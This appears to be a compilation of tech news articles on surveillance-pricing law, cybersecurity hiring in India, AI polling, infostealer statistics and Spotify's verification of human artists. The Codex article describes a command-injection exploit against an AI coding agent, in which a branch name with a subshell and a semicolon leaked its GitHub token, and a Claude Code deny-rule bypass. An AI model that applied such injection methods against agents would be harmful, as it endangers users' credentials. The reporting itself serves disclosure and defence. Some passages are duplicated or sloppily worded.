Furthermore, the law provides that individuals may be subject to misdemeanor penalties, including imprisonment for up to a year and a fine of up to $1,000 for committing a misdemeanor. The law will also provide businesses accused of violations with 45 days to remedy the alleged misconduct prior to formal enforcement, which critics claim could substantially lessen its deterrent effect. 

Due to the narrowly limited rights to sue outside of limited labor-related circumstances, early legal interpretations are anticipated to be primarily determined by state-led enforcement actions which identify whether algorithmic pricing decisions are based on protected categories of personal information.

Regulatory specialists anticipate that the forthcoming guidance will clarify the evidence standards necessary to establish data-driven pricing manipulation, particularly when such manipulation involves opaque artificial intelligence systems and automated pricing engines. For retailers with mature compliance programs, financial penalties are likely to remain manageable. However, legal observers observe that reputational damage, regulatory scrutiny, and the erosion of consumer trust may ultimately prove more consequential than statutory fines. 

Labor unions, consumer advocacy organizations, and analysts of digital rights have increased the debate over Maryland's surveillance pricing law by arguing that the legislation has significant operational gaps retailers could potentially exploit by utilizing sophisticated pricing strategies. Public awareness campaigns have already been launched by United Food and Commercial Workers International Union, including a 30-second advertisement in which algorithmic pricing systems are illustrated as a possible way to reshape grocery shopping based on predictions of consumer behavior.

The advocacy groups maintain that despite the statute's significant legal precedent, the exemptions and enforcement structure may ultimately permit the continuation of many forms of data-driven price discrimination. Before the bill was enacted, Consumer Reports researchers had warned lawmakers about the bill's weaknesses, arguing that it lacks a clear baseline price standard against which discriminatory pricing could be measured.

Policy analysts have suggested that this omission creates a situation where nearly any fluctuating price could be viewed as a promotional discount instead of a targeted surcharge. Additionally, criticism has focused on the law's narrow restrictions against individualized pricing while allowing hyper-segmented pricing models to segment consumers into highly specific groups based on demographics or behavioral characteristics. There has been a growing consensus among consumer advocates that pricing strategies that target narrowly defined groups of consumers such as elderly individuals living alone in restricted retail markets - can result in similar outcomes to direct targeting of individual consumers. 

The broad exemptions granted to loyalty programs, membership pricing structures, subscription-based purchases, and recurring service models are also being criticized as providing retailers with alternative mechanisms for deploying surveillance-based pricing systems that would not technically violate the law. 

Maryland's legislation has sparked widespread national interest as at least a dozen states are considering similar restrictions on algorithmic price personalization practices, including New York, New Jersey and Illinois. According to consumer rights advocates, the Maryland experience is an early example of a regulatory stress test that may provide guidance for how future state legislatures will address the intersection of artificial intelligence, behavioral analytics, and retail pricing governance in the future. 

Some critics of the current framework, such as consumer advocate Oyefeso, contend that it risk legitimizing more extensive surveillance-based pricing practices by implying to retailers that some forms of algorithmic personalization remain legal. Supporters of stronger reforms, however, believe the legislation may be revisited in subsequent sessions as lawmakers grapple with the practical realities of enforcing transparency and accountability in increasingly opaque AI-driven pricing environments. 

Regulating surveillance pricing in Maryland marks a significant shift in the broader debate about how artificial intelligence, consumer data, and algorithmic commerce should be regulated in essential retail markets. It is argued that the law's exemptions, cure periods, and enforcement limitations may reduce the law's effectiveness immediately; however, the legislation has already set a national standard by requiring policymakers, retailers, and technology companies to consider the ethical and regulatory implications of data-driven price personalization. 

Maryland's framework may serve as both a cautionary example and a basis for future policies relating to the protection of consumers from algorithmic pricing as more states consider similar measures and consumer scrutiny over algorithmic pricing increases. 

A growing number of grocery retailers and delivery platforms have become aware that pricing systems that use behavioral analytics and artificial intelligence will no longer be exempt from regulatory oversight, particularly when affordability, transparency, and public trust are at stake.

India’s Cybersecurity Workforce Struggles to Keep Pace as AI and Cloud Systems Expand

 



India’s fast-growing digital economy is creating an urgent demand for cybersecurity professionals, but companies across the country are finding it increasingly difficult to hire people with the technical expertise required to secure modern systems.

A new study released by the Data Security Council of India and SANS Institute found that businesses are facing a serious shortage of skilled cybersecurity workers as technologies such as artificial intelligence, cloud computing, and API-driven infrastructure become more deeply integrated into daily operations.

According to the Indian Cyber Security Skilling Landscape Report 2025–26, nearly 73 per cent of enterprises and 68 per cent of service providers said there is a limited supply of qualified cybersecurity professionals in the country. The report suggests that organisations are struggling to build teams capable of handling increasingly advanced cyber risks at a time when companies are rapidly digitising services, storing more information online, and adopting AI-powered tools.

The hiring process itself is also becoming slower. Around 84 per cent of organisations surveyed said cybersecurity positions often remain vacant for one to six months before suitable candidates are found. This delay reflects a growing mismatch between industry expectations and the skills available in the job market.

Researchers noted that many applicants entering the cybersecurity workforce lack practical exposure to real-world security environments. Around 63 per cent of enterprises and 59 per cent of service providers said candidates often do not possess sufficient hands-on technical experience. Employers are no longer only looking for basic security knowledge. Companies increasingly require professionals who understand multiple areas at once, including cloud infrastructure, application security, digital identity systems, and access management technologies. Nearly 58 per cent of enterprises and 60 per cent of providers admitted they are struggling to find candidates with this type of cross-functional expertise.

The report connects this shortage to the changing structure of enterprise technology systems. Many organisations are moving away from traditional on-premise setups and shifting toward cloud-native environments, interconnected APIs, and AI-supported operations. As businesses automate more routine tasks, demand is gradually moving away from entry-level operational positions and toward specialised cybersecurity roles that require analytical thinking, threat detection capabilities, and advanced technical decision-making.

Artificial intelligence is now becoming one of the largest drivers of cybersecurity hiring demand. Around 83 per cent of organisations surveyed described AI and generative AI security skills as essential for future operations, while 78 per cent reported strong demand for AI security engineers. The findings also show that nearly 62 per cent of enterprises are already running active AI or generative AI projects, which experts say can create additional security risks if systems are not properly monitored and protected.

As companies deploy AI systems, the attack surface for cybercriminals also expands. Security teams are now expected to defend AI models, protect sensitive datasets, monitor automated systems for manipulation, and secure APIs connecting multiple digital services. Industry experts have repeatedly warned that many organisations are adopting AI tools faster than they are building security frameworks around them.

Some cybersecurity positions remain especially difficult to fill. The report found that almost half of service providers and nearly 40 per cent of enterprises are struggling to recruit security architects, professionals responsible for designing secure digital infrastructure and long-term defence strategies. Demand is also increasing for specialists in operational technology and industrial control system security, commonly known as OT/ICS security. These professionals help protect critical infrastructure such as manufacturing facilities, power systems, transportation networks, and industrial operations from cyberattacks.

At the same time, companies are facing growing retention problems. Around 70 per cent of service providers and 42 per cent of enterprises said employees are frequently leaving for competitors offering better salaries and career opportunities. Limited access to advanced training and upskilling programs is also contributing to workforce attrition across the sector.

The findings point to a larger issue facing the cybersecurity industry globally: technology is evolving faster than workforce development. Experts believe companies, educational institutions, and training organisations may need to work more closely together to create industry-focused learning pathways that prepare professionals for modern cyber threats instead of relying heavily on theoretical instruction alone.

With India continuing to expand digital public infrastructure, cloud adoption, fintech services, AI development, and connected industrial systems, cybersecurity professionals are expected to play a central role in protecting sensitive information, maintaining operational stability, and preserving trust in digital platforms.

AI Polling Reshapes Political Research as Firms Turn Conversations Into Data

 

Artificial intelligence is rapidly transforming the world of political opinion polling, replacing time-consuming human-led interviews with automated conversational systems capable of analysing public sentiment at scale.

"When you hear the word 'politician', what is the first image or emotion that comes to mind?"

The question is asked not by a human researcher, but by an AI-powered voice assistant. While a respondent shares his views over the phone, multiple AI systems simultaneously analyse the conversation. One verifies whether the person is answering the question correctly, another evaluates the depth of the response, while a third checks for possible fraud or bot-like behaviour.

The technology is being developed by Naratis, a French start-up focused on bringing artificial intelligence into political opinion research.

"The US has start-ups like Outset, Listen Labs and Hey Marvin that do AI polling like this in the commercial sphere. To my knowledge we're the first to do this for political opinion polling as well," says Pierre Fontaine, the 28-year-old engineer who founded the firm in 2025.

The emergence of AI-led polling marks a major shift for an industry traditionally dependent on manual interviews and extensive human analysis. In countries such as France, polling firms are increasingly exploring automation to reduce costs and speed up research processes.

Naratis specifically targets qualitative research, which is widely regarded as the most expensive and labour-intensive form of polling. Traditionally, these studies involve one-on-one interviews or focus groups that can take weeks to organise and analyse. By using conversational AI, the company says it can significantly reduce both time and cost.

Rather than relying on standard multiple-choice surveys, the platform encourages participants to engage in conversations with AI systems. "We don't ask people to tick boxes - they have a conversation with an AI," Fontaine explains. "That means we can explore not just what people think, but how they think - how they build their opinions, and even when those opinions change."

The company claims its approach is "10 times faster, 10 times cheaper and 90% as accurate as human polling".

According to the firm, projects that previously required weeks and substantial budgets can now be completed within a couple of days, with some responses collected in less than 24 hours. Fontaine describes this advantage as "parallelisation", where numerous AI agents conduct interviews simultaneously instead of relying on individual human researchers.

The rise of AI polling comes at a challenging time for the polling industry overall. Survey participation rates have dropped sharply over the decades, increasing operational costs and raising concerns about the reliability and representativeness of public opinion studies.

Supporters of AI polling argue that conversational systems may encourage respondents to be more honest, especially when discussing politically sensitive issues. Some researchers believe this could reduce social desirability bias, where people avoid expressing controversial opinions to human interviewers.

However, critics remain cautious about the growing dependence on AI in political research. Concerns include the possibility of AI systems generating inaccurate conclusions, producing overly generic responses, or creating misleading synthetic data.

Questions have also emerged around the use of "digital twins" and "synthetic people" — AI-generated profiles designed to imitate real human behaviour. While some market research firms use such tools for testing and simulations, many organisations remain reluctant to apply them in political polling.

At Ipsos, AI is already used extensively in consumer and behavioural research, including analysing user-recorded videos and studying social media activity. However, major firms continue to maintain human oversight in politically sensitive projects.

At OpinionWay, AI may assist with conducting interviews, but "we would never publish an opinion poll based on AI-generated data," says CEO of OpinionWay Bruno Jeanbart, citing concerns about trust.

Experts believe the future of polling will likely involve a hybrid approach combining AI efficiency with human supervision. While automation can accelerate research and lower costs, human researchers are still considered essential for validating findings, interpreting nuance and ensuring accountability.

Even AI advocates acknowledge the need for caution. "The goal is end-to-end automation, but today it would be unsafe and socially unacceptable to remove humans entirely," says Le Brun.

As economic pressures continue to push the polling industry toward faster and cheaper methods, companies like Naratis are betting that AI-driven conversations could redefine how public opinion is collected and understood. Whether this transformation strengthens trust in polling or deepens public scepticism may ultimately depend on how responsibly the technology is implemented and regulated.

Ransomware Attacks Reach All Time High, Leaked Over 2.6 Billion Records

 

A recent analysis of cybercrime data of last year (2025) disclosed that ransomware victims have risen rapidly by 45% in the previous year. But this is not important, as there exists something more dangerous. The passive dependence on hacked credentials as the primary entry point tactic is the main concern. Regardless of the platforms used, the accounts you are trying to protect, it is high time users start paying attention to password security. 

State of Cybercrime report 2026


The report from KELA found over 2.86 billion hacked credentials, passwords, session cookies, and other info that allows 2FA authentication. Surprisingly, authentication services and business cloud accounted for over 30% of the leaked data in 2025.

The analysis also revealed that infostealer malware which compromised credentials is immune to whatever OS you are using, “infections on macOS devices increased from fewer than 1,000 cases in 2024 to more than 70,000 in 2025, a 7,000% increase,” the report said.

Expert advice


Experts from Forbes have warned users about the risks associated with infostealer malware endless times. The leaked data includes FBI operations aimed at shutting down cybercrime gangs, millions of gmail passwords within leaked infostealer logs, and much more. Despite the KELA analysis, the risk continues. To make things worse, the damage is increasing year after year.

About infostealer


Kela defined the malware as something that is “designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” What is more troublesome is the ubiquity of malware-as-a-service campaigns in the dark web world. The entry barrier is not closed, but the gates have been kicked wide open for experts as well as amateur threat actors. Data compromise in billions

Infostealer malware, according to Kela, ‘is designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” And with the now almost universal availability of malware-as-a-service operations to the infostealer criminal world, the barrier to entry has not only been lowered but kicked to the curb completely.

In 2025, Kela found around “3.9 million unique machines infected with infostealer malware globally, which collectively yielded 347.5 million compromised credentials.” The grand total amounts to 2.86 billion hacked credentials throughout all platforms: databases of infostealer logs and dark web criminal marketplaces.

Tricks used by infostealers:


AI-generated tailored scams, messaging apps, and email frequently use Phishing-as-a-Service to get around MFA. In so-called "hack your own password" assaults, users are duped into manually running scripts in order to circumvent conventional security measures.

Trojanized software is promoted by malicious advertisements and search results, increasing the risk of infection. In supply chain assaults, high-privilege credentials are the target of poisoned packages and DevTools impersonation. Form-grabbing and cookie theft are made possible via compromised browser extension updates. Fake software updates and pirated apps continued to be successful.

OpenAI Codex Bug Leads to GitHub Token Breach

 

In March 2026, researchers from BeyondTrust showed that a tailored GitHub branch name was enough to steal Codex’s OAuth token in cleartext. Tech giant OpenAI termed it as “Critical P1”. Soon after, Anthropic’s Claude Code source code leaked into the public npm registry, and Adversa’s Claude Code mutely ignored its own deny protocols once a prompt (command) exceeded over 50 subcommands.

Malicious codes in AI These codes were not isolated vulnerabilities. They were new in a nine-month campaign: six research teams revealed exploits against Copilot, Vertex AI, Codex, Claude Code. Every exploit followed the same strategy. An AI agent kept a credential, performed an action, and verified to a production system without any human session supporting the request.

The attack surface was first showcased at Balck Hat USA 2025, where experts hacked ChatGPT, Microsoft Copilot Studio, Gemini, Cursor and many more, on stage, with zero clicks. After nine, threat actors breached those same credentials.

How a branch name in Codex compromised GitHub


Researchers at BeyondTrust found Codex cloned repositories using a GitHub OAuth token attached in the git remote URL. While cloning, the branch name label allowed malicious data into the setup script. A backtick subshell and a semicolon changed the branch name into an extraction payload.

About the bug


The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been fixed in collaboration with OpenAI's security team.

This vulnerability allows an attacker to inject arbitrary commands through the GitHub branch name parameter, potentially leading to the theft of a victim's GitHub User Access Token—the same token Codex uses to authenticate with GitHub—through automated techniques. A victim's GitHub User Access Token, which Codex needs to authenticate with GitHub, may be stolen as a result.

Vulnerability impact


This vulnerability can scale to compromise numerous people interacting with a shared environment or GitHub repository using automated ways. The Codex CLI, Codex SDK, Codex IDE Extension, and the ChatGPT website are all impacted by the vulnerability. Since then, every issue that was reported has been fixed in collaboration with OpenAI's security team.

“OpenAI Codex is a cloud-based coding agent, accessible through ChatGPT. It allows users to point the tool toward a codebase and submit tasks through a prompt. Codex then spins up a managed container instance to execute these tasks—such as generating code, answering questions about a codebase, creating pull requests, and performing code reviews against the selected repository,” said Beyond Trust.

Spotify Verified Badge Targets AI Music Confusion as Human Artist Authentication Expands

 

Now appearing beside artist profiles, Spotify’s new “Verified by Spotify” badge uses a green checkmark to highlight real human creators. Only accounts meeting the platform’s internal authenticity checks receive the label. Rather than algorithm-built personas, these profiles represent actual musicians behind the music. The rollout is happening gradually, changing how artists appear in searches, playlists, and recommendations. 

The update arrives as concerns continue growing around AI-generated music flooding streaming services. Spotify says verification depends on signals such as active social media accounts, consistent listener activity, merchandise listings, and live performance schedules - indicators suggesting a genuine person is tied to the profile. 

According to the company, these measures are designed to separate human creators from automated content increasingly appearing online.  Spotify says most artists users actively search for will eventually receive verification. Artists recognized for meaningful contributions to music culture are expected to be prioritized ahead of bulk-uploaded or mass-generated accounts. 

Over the coming weeks, the checkmarks will gradually appear across the platform, with influence and authenticity carrying more weight than upload volume. The move comes as streaming platforms face mounting criticism over how they handle AI-generated tracks. While the badge confirms a profile belongs to a real person, some critics quickly pointed out that it does not indicate whether artificial intelligence was used to help create the music itself. 

Questions around what counts as “real” music continue growing as AI tools become more involved in production. Creator-rights advocate and former AI executive Ed Newton-Rex warned that systems like Spotify’s may unintentionally disadvantage independent musicians who do not tour, sell merchandise, or maintain strong social media visibility. 

Instead, he suggested platforms should directly label AI-generated songs rather than relying solely on artist verification. Experts also note that defining AI involvement in music is increasingly difficult. Professor Nick Collins from Durham University described AI-assisted music creation as a broad spectrum rather than a simple divide between human-made and machine-made work. Many songs now involve software-assisted mixing, mastering, composition, or editing, making it far harder to classify music by origin alone. 

Spotify has faced years of criticism over AI-generated audio. Across forums and online communities, users have repeatedly called for clearer labels showing whether tracks were created by humans or algorithms. Some developers have even built independent tools aimed at detecting and filtering AI-generated songs on the platform. Concerns intensified after projects like The Velvet Sundown attracted large audiences despite having no interviews, live performances, or publicly traceable history. 

The group later described itself as a “synthetic music project” supported by artificial intelligence, fueling debate around transparency in digital music spaces. Spotify’s latest verification effort appears aimed at rebuilding trust while balancing support for evolving AI technologies. The move also reflects a broader trend across digital platforms, where companies are introducing verification systems to distinguish human-created content from synthetic material as AI-generated media becomes harder to identify.